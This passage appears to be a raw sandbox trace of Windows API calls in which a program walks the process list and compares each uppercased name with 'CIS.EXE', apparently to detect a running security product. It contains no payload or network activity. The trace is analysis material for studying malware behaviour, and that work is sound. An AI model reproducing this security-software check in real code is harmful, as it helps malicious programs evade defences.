lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.221] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.221] lstrlenW (lpString="svchost.exe") returned 11 [0163.221] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.221] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.221] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.221] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.221] lstrlenW (lpString="svchost.exe") returned 11 [0163.221] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.222] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.222] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.222] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.222] lstrlenW (lpString="svchost.exe") returned 11 [0163.222] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.222] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.222] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.223] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.223] lstrlenW (lpString="audiodg.exe") returned 11 [0163.223] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.223] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="CIS.EXE") returned -1 [0163.223] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.224] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.224] lstrlenW (lpString="svchost.exe") returned 11 [0163.224] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.224] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.224] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.224] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.225] lstrlenW (lpString="svchost.exe") returned 11 [0163.225] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.225] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.225] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.225] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.225] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.225] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.225] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="CIS.EXE") returned 1 [0163.225] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.226] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.226] lstrlenW (lpString="svchost.exe") returned 11 [0163.226] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.226] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.226] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.227] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.227] lstrlenW (lpString="taskhost.exe") returned 12 [0163.227] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.227] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.227] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.228] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.228] lstrlenW (lpString="taskeng.exe") returned 11 [0163.228] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.228] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CIS.EXE") returned 1 [0163.228] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.228] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.228] lstrlenW (lpString="dwm.exe") returned 7 [0163.228] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.228] lstrcmpW (lpString1="DWM.EXE", lpString2="CIS.EXE") returned 1 [0163.228] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.229] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.229] lstrlenW (lpString="explorer.exe") returned 12 [0163.229] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.229] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="CIS.EXE") returned 1 [0163.229] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.230] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.230] lstrlenW (lpString="taskeng.exe") returned 11 [0163.230] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.230] lstrcmpW (lpString1="TASKENG.EXE", lpString2="CIS.EXE") returned 1 [0163.230] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.230] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.230] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.230] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.231] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="CIS.EXE") returned 1 [0163.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.231] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.231] lstrlenW (lpString="taskhost.exe") returned 12 [0163.231] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.231] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.232] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.232] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.232] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.232] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="CIS.EXE") returned -1 [0163.232] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.233] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.233] lstrlenW (lpString="tri.exe") returned 7 [0163.233] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.233] lstrcmpW (lpString1="TRI.EXE", lpString2="CIS.EXE") returned 1 [0163.233] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.233] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.233] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.234] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.234] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="CIS.EXE") returned 1 [0163.234] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.235] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.235] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.235] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.235] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="CIS.EXE") returned -1 [0163.235] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.236] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.236] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.236] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.236] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="CIS.EXE") returned 1 [0163.236] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.237] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.237] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.237] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.237] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="CIS.EXE") returned 1 [0163.237] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.238] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.238] lstrlenW (lpString="isolation.exe") returned 13 [0163.238] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.238] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="CIS.EXE") returned 1 [0163.238] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.238] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.238] lstrlenW (lpString="abc.exe") returned 7 [0163.238] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.238] lstrcmpW (lpString1="ABC.EXE", lpString2="CIS.EXE") returned -1 [0163.238] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.239] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.239] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.239] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.239] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="CIS.EXE") returned 1 [0163.239] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.240] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.240] lstrlenW (lpString="english_performing.exe") returned 22 [0163.240] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.240] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="CIS.EXE") returned 1 [0163.240] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.241] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.241] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.241] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.241] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="CIS.EXE") returned 1 [0163.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.241] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.241] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.241] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.241] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="CIS.EXE") returned 1 [0163.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.242] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.242] lstrlenW (lpString="volume.exe") returned 10 [0163.242] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.242] lstrcmpW (lpString1="VOLUME.EXE", lpString2="CIS.EXE") returned 1 [0163.242] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.243] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.243] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.243] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.243] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="CIS.EXE") returned 1 [0163.243] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.244] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.244] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.244] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.244] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="CIS.EXE") returned 1 [0163.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.244] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.244] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.244] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.244] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="CIS.EXE") returned 1 [0163.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.245] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.245] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.245] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.245] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="CIS.EXE") returned 1 [0163.245] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.246] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.246] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.246] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.246] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="CIS.EXE") returned 1 [0163.246] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.247] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.247] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.247] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.247] lstrcmpW (lpString1="EXCEL.EXE", lpString2="CIS.EXE") returned 1 [0163.247] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.247] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.247] lstrlenW (lpString="svchost.exe") returned 11 [0163.247] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.247] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.248] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.248] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.248] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.248] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="CIS.EXE") returned 1 [0163.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.249] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.249] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.249] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", 